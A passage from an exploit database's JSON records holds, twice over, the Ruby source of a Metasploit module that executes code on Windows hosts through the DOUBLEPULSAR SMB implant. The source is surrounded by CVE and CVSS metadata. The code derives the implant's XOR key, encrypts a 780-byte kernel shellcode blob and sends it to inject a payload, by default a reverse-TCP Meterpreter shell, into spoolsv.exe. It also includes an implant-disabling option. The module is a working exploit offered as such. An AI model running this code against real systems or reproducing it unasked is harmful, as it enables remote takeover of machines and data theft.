(32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-14] #"}, "lastseen": "2021-10-14T08:19:40", "differentElements": ["sourceData"], "edition": 43}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "04dfa0f8e68270a3810c72abd850701e", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-14T22:25:08", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-14T22:25:08", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-14T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def 